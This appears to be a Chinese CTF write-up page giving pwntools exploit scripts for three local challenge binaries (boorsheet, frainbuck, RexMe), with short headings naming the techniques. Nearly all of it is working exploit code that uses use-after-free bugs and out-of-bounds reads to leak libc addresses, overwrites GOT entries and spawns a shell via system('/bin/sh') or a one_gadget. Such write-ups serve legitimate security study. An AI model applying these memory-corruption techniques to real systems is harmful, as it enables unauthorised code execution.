boorsheet
- 利用uaf劫持程序控制流
from pwn import *
context.log_level = 'debug'
def create_char(length,name,type_char):
p.recvuntil('choice : ')
p.sendline('1')
p.recvuntil(' name :')
p.sendline(str(length))
p.recvuntil('character :')
p.send(name)
p.recvuntil('character :')
p.sendline(type_char)
def view_char():
p.recvuntil('choice : ')
p.sendline('2')
def delete_char(index):
p.recvuntil('choice : ')
p.sendline('3')
p.recvuntil('to eat:')
p.sendline(str(index))
def clean():
p.recvuntil('choice : ')
p.sendline('4')
def yincang():
p.recvuntil('choice : ')
p.sendline('1337')
def new(size,name,content):
p.recvuntil('$ ')
p.sendline('new')
p.recvuntil('size:')
p.sendline(str(size))
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('content:')
p.sendline(content)
def edit(index,name,content):
p.recvuntil('$ ')
p.sendline('edit')
p.recvuntil('index:')
p.sendline(str(index))
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('content:')
p.sendline(content)
def delete(index):
p.recvuntil('$ ')
p.sendline('delete')
p.recvuntil('index:')
p.sendline(str(index))
def show(index):
p.recvuntil('$ ')
p.sendline('show')
p.recvuntil('index:')
p.sendline(str(index))
def mark(index,mark_info):
p.recvuntil('$ ')
p.sendline('mark')
p.recvuntil('mark:')
p.sendline(str(index))
p.recvuntil('info:')
p.sendline(mark_info)
def show_mark(index):
p.recvuntil('$ ')
p.sendline('show_mark')
p.recvuntil('index:')
p.sendline(str(index))
def delete_mark(index):
p.recvuntil('$ ')
p.sendline('delete_mark')
p.recvuntil('index:')
p.sendline(str(index))
def edit_mark(index):
p.recvuntil('$ ')
p.sendline('edit_mark')
p.recvuntil('index:')
p.sendline(str(index))
p = process('./boorsheet')
elf = ELF('./boorsheet')
puts_got = elf.got['puts']
yincang()
new(0x10,'a','1')
mark(0,'b')
#use uaf to hijack note->content --> struct_mark
delete_mark(0)
#leak elf_base
new(0x18,'b','2'*0xf)
show(1)
p.recvuntil('2'*0xf+'\x00')
elf_base = u64(p.recv(8)) - 0x11E6
log.success('elf_base addr : 0x%x'%elf_base)
#leak libc_base
edit(1,'b',p32(0) + p32(0) + p64(puts_got+elf_base)[:6])
show_mark(0)
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_puts
log.success('libc_base addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)
#hijack *puts_function -> system('/bin/sh\x00')
edit(1,'b',p32(0) + p32(0) + p64(binsh_addr) + p64(system_addr))
#trigger system('/bin/sh\x00')
show_mark(0)
p.interactive()
`
frainbuck
- 利用类似brainfuck进行数组越界泄漏libc改got表
from pwn import *
context.log_level = 'debug'
p = process('./frainbuck')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
stdout = 0x602080
ptr_data = 0x6020C0
exit_got = 0x602060
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
'''
> ++ptr;
< --ptr;
+ ++*ptr;
- --*ptr;
. putchar(*ptr);
, *ptr=getchar();
[ while(*ptr){
] }
'''
payload = '<'*(ptr_data - stdout)
payload += '[.>]'
payload += '<'*6
payload += '<'*(stdout - exit_got)
payload += ',[>,]'
#gdb.attach(p,'b *0x04009A9')
p.recvuntil('code: ')
p.sendline(payload)
libc_base = u64(p.recv(6).ljust(8,'\x00')) - _IO_2_1_stdout_offset
one_gadget = libc_base + 0x45216
log.success('libc_base addr : 0x%x'%libc_base)
log.success('one_gadget addr : 0x%x'%one_gadget)
p.send(p64(one_gadget))
p.interactive()
RexMe
- uaf利用name泄漏libc,改写got表
from pwn import *
context.log_level = 'debug'
def login(name):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil('name:')
p.send(name+'\x00')
def register(size,name,age,des):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil(' size:')
p.sendline(str(size))
p.recvuntil('name:')
p.send(name)
p.recvuntil('age:')
p.sendline(str(age))
p.recvuntil('description:')
p.send(des)
def view_profile():
p.recvuntil('choice:')
p.sendline('1')
def updata_profile(name,age,des):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil('name:')
p.send(name)
p.recvuntil('age:')
p.sendline(str(age))
p.recvuntil('description:')
p.send(des)
def add_or_delete_friend(name,a_d):
p.recvuntil('choice:')
p.sendline('3')
p.recvuntil('name:')
p.send(name+'\x00')
p.recvuntil('this friend?(a/d)')
p.sendline(a_d)
def send_a_message(name,title,content):
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send(name+'\x00')
p.recvuntil('title:')
p.send(title)
p.recvuntil('content:')
p.send(content)
def view_your_message():
p.recvuntil('choice:')
p.sendline('5')
def logout():
p.recvuntil('choice:')
p.sendline('6')
p = process('./RexMe')
elf = ELF('./RexMe')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
strdup_plt = 0x4007f6
strdup_got = elf.got['strdup']
register(10,'a'*8,20,'a')
register(10,'b'*8,20,'b')
#gdb.attach(p,'b *0x40142F')
login('a'*8)
add_or_delete_friend('b'*8,'a')
add_or_delete_friend('b'*8,'d')
logout()
#leak libc
register(10,p64(strdup_got),20,'b')
login(p64(strdup_plt))
send_a_message('a'*8,'a','a')
view_profile()
offset_strdup = 0x000000000008b470
offset_system = 0x0000000000045390
p.recvuntil('Username:')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_strdup
log.success('libc_base addr : 0x%x'%libc_base)
one_gadget = libc_base + 0x45216
log.success('one_gadget addr : 0x%x'%one_gadget)
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)
#hijack strdup_got -> system_addr
updata_profile(p64(system_addr),'20','b')
#system('/bin/sh\x00')
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send('a'*8+'\x00')
p.recvuntil('title:')
p.send('/bin/sh\x00')
p.interactive()
网友评论